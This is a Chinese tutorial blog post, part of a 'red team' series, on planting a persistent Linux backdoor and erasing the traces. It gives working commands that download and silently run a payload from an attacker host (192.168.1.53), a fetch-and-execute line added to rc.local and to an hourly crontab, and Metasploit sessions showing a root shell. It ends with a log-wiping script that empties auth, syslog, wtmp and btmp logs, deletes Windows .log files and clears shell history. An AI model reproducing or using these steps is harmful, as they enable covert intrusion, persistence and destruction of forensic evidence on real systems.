前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >红队/白帽必经之路(23)——如何通过如何使用脚本以及Metasploit来进行自动创建后门以及如何做到红方真正的销声匿迹 [既然是红队,那就对自己狠一点]

红队/白帽必经之路(23)——如何通过如何使用脚本以及Metasploit来进行自动创建后门以及如何做到红方真正的销声匿迹 [既然是红队,那就对自己狠一点]

作者头像
盛透侧视攻城狮
发布于 2024-12-25 01:27:39
发布于 2024-12-25 01:27:39
9000
代码可运行
举报
运行总次数:0
代码可运行

1.实战-使用脚本来进行自动创建后门

1.2配置脚本程序

写入以下内容
代码语言:javascript
代码运行次数:0
运行
复制
#!/bin/bash

#切换工作目录
cd /tmp/

#把前面下载 Vegile 到执行后门文件的命令使用&&拼接成一条命令;&&表示前面的命令执行成功则执行下一条命令

# echo y | 表示将 y 作为 Vegile 命令的输入,因为执行 Vegile 命令是需要我们按任意键退出,所
以我们手动输入一个字符让程序执行完成后自动退出。

#>> /dev/null 2>&1 不显示所有输出结果。

wget 192.168.1.53/Vegile-master.zip && unzip Vegile-master.zip && cd Vegile-master && chmod
+x Vegile && wget 192.168.1.53/xuegod-ghost && chmod +x xuegod-ghost && echo y | ./Vegile --i xuegod-ghost >> /dev/null 2>&1

#2>&1 的意思就是将标准错误重定向到标准输出。这里标准输出已经重定向到了 /dev/null。那么标准错误也会输出到/dev/null/dev/null 可以看作"黑洞". 它等价于一个只写文件. 所有写入它的内容都会永远丢失. 而尝试从它那儿读取内容则什么也读不到


#删除下载的所有文件

rm -rf /tmp/Vegile-master.zip /tmp/Vegile-master
  • 保存退出即可,脚本文件不需要添加执行权限
回到 MSF 控制台进行测试
  • 首先我们先清空后台任务和前面已经建立的 session
代码语言:javascript
代码运行次数:0
运行
复制
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# msfconsole
Metasploit tip: Use the analyze command to suggest runnable modules for 
hosts
                                                  
IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v6.3.55-dev                          ]
+ -- --=[ 2397 exploits - 1232 auxiliary - 422 post       ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/



msf6 > 
msf6 > 
msf6 > use /exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > jobs -K
Stopping all jobs...
msf6 exploit(multi/handler) > sessions -K
[*] Killing all sessions...
msf6 exploit(multi/handler) >  exploit -j
回到centos 上执行一下脚本
参数详解:
  • bash <() #表示将括号中的内容通过 bash 来执行
  • curl -s -L #curl 是一个利用 URL 语法在命令行下进行文件传输的工具
  • -s --silent #表示静默模式不输出任何内容
  • -L 跟 http 连接,组合使用的效果是把 http 连接中的文件下载到内存中,然后传 bash,进行执行。
  • 上述的好处是:本地不会保存任何文件。
  • >> /dev/null 2>&1 不输出任何信息
回到 MSF 控制台
这时候pwd
代码语言:javascript
代码运行次数:0
运行
复制
msf6 exploit(multi/handler) > sessions -i 21
[*] Starting interaction with 21...
pwd
pwd: error retrieving current directory: getcwd: cannot access parent directories: No
such file or directory
  • 可以看到,提示目录不存在,因为 payload 所在的 Vegile-master 目录已被删除,我们只需要切换目录即可。
代码语言:javascript
代码运行次数:0
运行
复制
cd /root/
pwd
/root
id
uid=0(root) gid=0(root) groups=0(root)
注意:
  • tmp 目录中我们下载的所有文件也被清除。

1.3配置开机启动

把所需执行命令添加到开机启动项
原因:
  • 一般黑帽进来都会在开机启动项里加点东西,/etc/rc.local
代码语言:javascript
代码运行次数:0
运行
复制
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# echo "bash <(curl -s -L http://192.168.1.53/xuegod.sh) >>/dev/null 2>&1" >> /etc/rc0.d/rc.local  
添加可执行权限
代码语言:javascript
代码运行次数:0
运行
复制
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─#  chmod +x /etc/rc0.d/rc.local
回到 MSF 控制台开启侦听
代码语言:javascript
代码运行次数:0
运行
复制
msf6 exploit(multi/handler) >  sessions -K   #删除原来的会话
[*] Killing all sessions...
msf6 exploit(multi/handler) > exploit -j       #重新侦听
reboot centos 操作系统

1.3配置计划任务

查看系统级别计划任务
代码语言:javascript
代码运行次数:0
运行
复制
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─#  ll /etc/crontab
-rw-r--r-- 1 root root 1042 2024121/etc/crontab
代码语言:javascript
代码运行次数:0
运行
复制
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─#  vim /etc/crontab
参数详解:
代码语言:javascript
代码运行次数:0
运行
复制
PATH=/sbin:/bin:/usr/sbin:/usr/bin #系统执行命令的搜索路径
MAILTO=root #将执行任务的信息通过邮件发送给 xx 用户
末行添加:
代码语言:javascript
代码运行次数:0
运行
复制
0 */1 * * * root bash <(curl -s -L http://192.168.1.53/xuegod.sh) >> /dev/null 2>&1
#保存退出,每小时执行一次。

2.系统日志清理——销声匿迹

2.1Windows 日志清理

  • Win+R 运行:eventvwr
  • 正常的远程访问在 windows 的时间查看器中可以看到相关记录

回到控制台查看

删除系统日志目录下的一些日志文件。
代码语言:javascript
代码运行次数:0
运行
复制
meterpreter > shell
C:\Windows\system32>del %WINDIR%\*.log /a/s/q/f



del:删除文件。
%WINDIR%*.log:
%WINDIR%:Windows 操作系统安装目录,通常为 C:\Windows。
*.log:匹配所有 .log 后缀的日志文件。
/a:按属性删除文件。可以删除具有指定属性的文件(例如只读、隐藏、系统文件等)。
/s:递归删除当前目录及所有子目录中的 .log 文件。
/q:安静模式,不显示删除确认提示,直接删除。
/f:强制删除只读文件。

2.2Linux 日志清理

清理历史命令
代码语言:javascript
代码运行次数:0
运行
复制
history -c
让系统不再保存历史命令
代码语言:javascript
代码运行次数:0
运行
复制
vi /etc/profile,找到 HISTSIZE 这个值,修改为 0
删除访问日志

1. 访问失败的日志

代码语言:javascript
代码运行次数:0
运行
复制
删除登录失败记录:

echo > /var/log/btmp

2. 访问成功的日志

代码语言:javascript
代码运行次数:0
运行
复制
删除登录成功记录:

echo > /var/log/wtmp 

#此时再次执行 last 命令就会发现没有记录

3. 删除日志记录:

代码语言:javascript
代码运行次数:0
运行
复制
echo > /var/log/secure
最后脚本汇总
代码语言:javascript
代码运行次数:0
运行
复制
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# cat clog.sh
#!/usr/bin/bash
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/btmp
echo > /var/run/utmp
history -c
注意:
  • 执行时查看文件是否有执行权限且删除日志一般只有 root 权限才可以。
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2024-12-25,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]
盛透侧视攻城狮
2024/12/25
1470
红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]
红队/白帽必经之路(19)——如何用Metasploit 制作Linux恶意木马病毒/软件获取shell[既然是红队,那就对自己狠一点]
盛透侧视攻城狮
2024/12/25
2250
红队/白帽必经之路(19)——如何用Metasploit 制作Linux恶意木马病毒/软件获取shell[既然是红队,那就对自己狠一点]
红队/白帽必经之路(17)——如何用Metasploit 制作Windows恶意木马病毒/软件获取shell[既然是红队,那就对自己狠一点!!!]
盛透侧视攻城狮
2024/12/25
2180
红队/白帽必经之路(17)——如何用Metasploit 制作Windows恶意木马病毒/软件获取shell[既然是红队,那就对自己狠一点!!!]
红队/白帽必经之路(24)——实战之如何通过Metasploit 利用 已知 漏洞 CVE-2018-8174 以及基于 java 环境的漏洞利用获取 获取 shell[既然是红队,那就对自己狠一点]
盛透侧视攻城狮
2024/12/25
910
红队/白帽必经之路(24)——实战之如何通过Metasploit 利用 已知 漏洞 CVE-2018-8174 以及基于 java 环境的漏洞利用获取 获取 shell[既然是红队,那就对自己狠一点]
红队/白帽必经之路(16)——如何用Metasploit 在边路进行信息刺探及爆破登录[既然是红队,那就对自己狠一点!!!]
盛透侧视攻城狮
2024/12/25
1290
红队/白帽必经之路(16)——如何用Metasploit 在边路进行信息刺探及爆破登录[既然是红队,那就对自己狠一点!!!]
红队/白帽必经之路(21)——实战之使用 ms17-010 永恒之蓝漏洞对 win7 PC 进行渗透进而达到勒索[既然是红队,那就对自己狠一点]
盛透侧视攻城狮
2024/12/25
870
红队/白帽必经之路(21)——实战之使用 ms17-010 永恒之蓝漏洞对 win7 PC 进行渗透进而达到勒索[既然是红队,那就对自己狠一点]
红队/白帽必经之路(18)——如何用Metasploit 制作Windows恶意木马病毒/软件获取shell[既然是红队,那就对自己狠一点]
盛透侧视攻城狮
2024/12/25
1470
红队/白帽必经之路(18)——如何用Metasploit 制作Windows恶意木马病毒/软件获取shell[既然是红队,那就对自己狠一点]
网络空间安全之一个WH的超前沿全栈技术深入学习之路(14)h红队/白帽必经之路——如何用Metasploit 渗透测试之信息收集篇[竟然是红队,那就对自己狠一点]
盛透侧视攻城狮
2024/12/25
1180
网络空间安全之一个WH的超前沿全栈技术深入学习之路(14)h红队/白帽必经之路——如何用Metasploit 渗透测试之信息收集篇[竟然是红队,那就对自己狠一点]
红队/白帽必经之路(20)——实战之使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透[既然是红队,那就对自己狠一点]
盛透侧视攻城狮
2024/12/25
2440
红队/白帽必经之路(20)——实战之使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透[既然是红队,那就对自己狠一点]
网络空间安全之一个WH的超前沿全栈技术深入学习之路(15)红队/白帽必经之路——如何用Metasploit 在边路进行信息刺探及收集[既然是红队,那就对自己狠一点]
盛透侧视攻城狮
2024/12/25
1270
网络空间安全之一个WH的超前沿全栈技术深入学习之路(15)红队/白帽必经之路——如何用Metasploit 在边路进行信息刺探及收集[既然是红队,那就对自己狠一点]
网络空间安全之一个WH的超前沿全栈技术深入学习之路(13-3)红队必经之路——实战如何用Metasploit 渗透她的Win主机并远程执行命令才不会让我释怀[竟然是红队,那就对自己狠一点]
盛透侧视攻城狮
2024/12/25
1070
网络空间安全之一个WH的超前沿全栈技术深入学习之路(13-3)红队必经之路——实战如何用Metasploit 渗透她的Win主机并远程执行命令才不会让我释怀[竟然是红队,那就对自己狠一点]
网络空间安全之一个WH的超前沿全栈技术深入学习之路(13-2)白帽必经之路——如何用Metasploit 渗透到她的心才不会让我释怀
盛透侧视攻城狮
2024/12/25
760
网络空间安全之一个WH的超前沿全栈技术深入学习之路(13-2)白帽必经之路——如何用Metasploit 渗透到她的心才不会让我释怀
红队/白帽必经之路(25)——实战之如何通过Metasploit 及利用宏感染 word 文档获取 shell最后拿下Administrator[既然是红队,那就对自己狠一点]
盛透侧视攻城狮
2024/12/25
1030
红队/白帽必经之路(25)——实战之如何通过Metasploit 及利用宏感染 word 文档获取 shell最后拿下Administrator[既然是红队,那就对自己狠一点]
Metasploit 生成各种后门
Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,同时该工具也是渗透测试环境中的利器,它支持多平台Payload的生成具有完全的跨平台性,本次实验将学会生成各种攻击载荷。
王瑞MVP
2022/12/28
1.2K0
CISP-PTS中的渗透小技巧分享
1.3、XXE相关技巧 1.3.1、XXE载荷构技巧 使用seclists的XXE-Fuzzing.txt的第9行,做一个简单改造即可使用。对比如下: 改造前: <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 改造后: <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "file:///etc/passwd" >]> XXE-Fuzzing.txt的路径:SecLists\Fuzzing\XXE-Fuzzing.txt 有了上述载荷以后,再加上回显位置即可成功利用,完整载荷示例: <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "file:///etc/passwd" >]> <name> <email> &foo; </email> </name> 1.3.2、命令执行&&getshell 命令执行的原理是把文件读取用的file://协议换成了expect://协议。 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "expect://id" >]> <name> <email> &foo; </email> </name> getshell则是命令执行的变种,通过上传webshell来。 利用前提:知道目标服务器的脚本语言类型和webshell上传后的大致位置。如果是OSS上,直接寄。 1)使用python托管webshell python -m http.server 8088 2)下载webshell <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "expect://curl$IFS'vps_addr:port/111.php'$IFS-o$IFS'222.php'" >]> <name> <email> &foo; </email> </name> 此处webshell下载解析: curl -O vps_addr:port/111.php curl vps_addr:port/111.php -o 222.php 空格用$IFS来替代,没啥好说的,常规思路。 下载url不能带协议 下载url用单引号包裹,如果是-o方式,保存文件的名称也用单引号包裹起来。 1.4、.user.ini文件上传 这个跟.htaccess差不多,.user.ini是php给用户的自定义配置文件,可将指定文件按照php脚本文件的形式解析。 介绍:https://blog.csdn.net/cosmoslin/article/details/120793126 利用过程: 1)上传.user.ini filename:.user.ini Content-type:image/jpeg 文件正文: GIF89a auto_prepend_file = aaa.jpg 2)上传webshell filename: aaa.jpg Content-type:image/jpeg 文件正文: GIF89a <?php @eval($_POST[22]);?> # 可替换为其他webshell 1.5、盲注分析 导出数据包: 文件——导出分组解析结果——为纯文本 通过notepad++解码: 提取所有注入数据包,此处使用notepad++中的标记功能,查找模式设置为正则表达式。 提取出来以后,找到临界值。当上面的查询语句从1,1到2,1,则上一条语句的=''的值就是SQLi获取到的数据。 找到所有数据后,用英文的逗号隔开,然后使用convert从dec转成text。 1.6、phpmyadmin后台写日志马 前提:知道web根目录。 set global general_log = 'on'; set global general_log_file = 'c:/phpstudy/111.php' select "<?php @eval($_POST[22]);?>" web根目
潇湘信安
2024/07/04
2610
CISP-PTS中的渗透小技巧分享
1.3 Metasploit 生成SSL加密载荷
在本节中,我们将介绍如何通过使用Metasploit生成加密载荷,以隐藏网络特征。前一章节我们已经通过Metasploit生成了一段明文的ShellCode,但明文的网络传输存在安全隐患,因此本节将介绍如何通过生成SSL证书来加密ShellCode,使得网络特征得到隐藏,从而提高后门的生存能力和抵抗网络特征分析的能力。
王瑞MVP
2023/07/01
2080
1.3 Metasploit 生成SSL加密载荷
MSF恶意程序利用【实战】
作为一名渗透测试者,我们可以击败安全防御机制,但这是仅仅是我们工作的一部分。当你进行渗透攻击时,请记住如下的忠告:
用户10781703
2024/08/19
1420
红队战术-用ssl加密你的metasploit通信
混淆是混淆不过人为分析的,只有加密才是yyds,而ssl加密是最常用的加密手段,比如c2上个ssl证书,配合一个aws
Gamma实验室
2023/09/13
4400
红队战术-用ssl加密你的metasploit通信
Metasploit学习笔记
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。
HACK学习
2019/08/07
1.4K0
基于Metasploit的软件渗透测试
Windows 2000 Professional 链接:https://pan.baidu.com/s/13OSz_7H1mIpMKJMq92nEqg?pwd=upsm 提取码:upsm Win
顾翔
2022/09/23
3.9K0
基于Metasploit的软件渗透测试
推荐阅读
红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]
1470
红队/白帽必经之路(19)——如何用Metasploit 制作Linux恶意木马病毒/软件获取shell[既然是红队,那就对自己狠一点]
2250
红队/白帽必经之路(17)——如何用Metasploit 制作Windows恶意木马病毒/软件获取shell[既然是红队,那就对自己狠一点!!!]
2180
红队/白帽必经之路(24)——实战之如何通过Metasploit 利用 已知 漏洞 CVE-2018-8174 以及基于 java 环境的漏洞利用获取 获取 shell[既然是红队,那就对自己狠一点]
910
红队/白帽必经之路(16)——如何用Metasploit 在边路进行信息刺探及爆破登录[既然是红队,那就对自己狠一点!!!]
1290
红队/白帽必经之路(21)——实战之使用 ms17-010 永恒之蓝漏洞对 win7 PC 进行渗透进而达到勒索[既然是红队,那就对自己狠一点]
870
红队/白帽必经之路(18)——如何用Metasploit 制作Windows恶意木马病毒/软件获取shell[既然是红队,那就对自己狠一点]
1470
网络空间安全之一个WH的超前沿全栈技术深入学习之路(14)h红队/白帽必经之路——如何用Metasploit 渗透测试之信息收集篇[竟然是红队,那就对自己狠一点]
1180
红队/白帽必经之路(20)——实战之使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透[既然是红队,那就对自己狠一点]
2440
网络空间安全之一个WH的超前沿全栈技术深入学习之路(15)红队/白帽必经之路——如何用Metasploit 在边路进行信息刺探及收集[既然是红队,那就对自己狠一点]
1270
网络空间安全之一个WH的超前沿全栈技术深入学习之路(13-3)红队必经之路——实战如何用Metasploit 渗透她的Win主机并远程执行命令才不会让我释怀[竟然是红队,那就对自己狠一点]
1070
网络空间安全之一个WH的超前沿全栈技术深入学习之路(13-2)白帽必经之路——如何用Metasploit 渗透到她的心才不会让我释怀
760
红队/白帽必经之路(25)——实战之如何通过Metasploit 及利用宏感染 word 文档获取 shell最后拿下Administrator[既然是红队,那就对自己狠一点]
1030
Metasploit 生成各种后门
1.2K0
CISP-PTS中的渗透小技巧分享
2610
1.3 Metasploit 生成SSL加密载荷
2080
MSF恶意程序利用【实战】
1420
红队战术-用ssl加密你的metasploit通信
4400
Metasploit学习笔记
1.4K0
基于Metasploit的软件渗透测试
3.9K0
相关推荐
红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队,那就对自己狠一点]
更多 >
目录
  • 1.实战-使用脚本来进行自动创建后门
    • 1.2配置脚本程序
      • 写入以下内容
      • 回到 MSF 控制台进行测试
      • 回到centos 上执行一下脚本
      • 回到 MSF 控制台
      • 这时候pwd
    • 1.3配置开机启动
      • 把所需执行命令添加到开机启动项
      • 添加可执行权限
      • 回到 MSF 控制台开启侦听
      • reboot centos 操作系统
    • 1.3配置计划任务
      • 查看系统级别计划任务
      • 末行添加:
  • 2.系统日志清理——销声匿迹
    • 2.1Windows 日志清理
      • 删除系统日志目录下的一些日志文件。
    • 2.2Linux 日志清理
      • 清理历史命令
      • 让系统不再保存历史命令
      • 删除访问日志
      • 最后脚本汇总
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验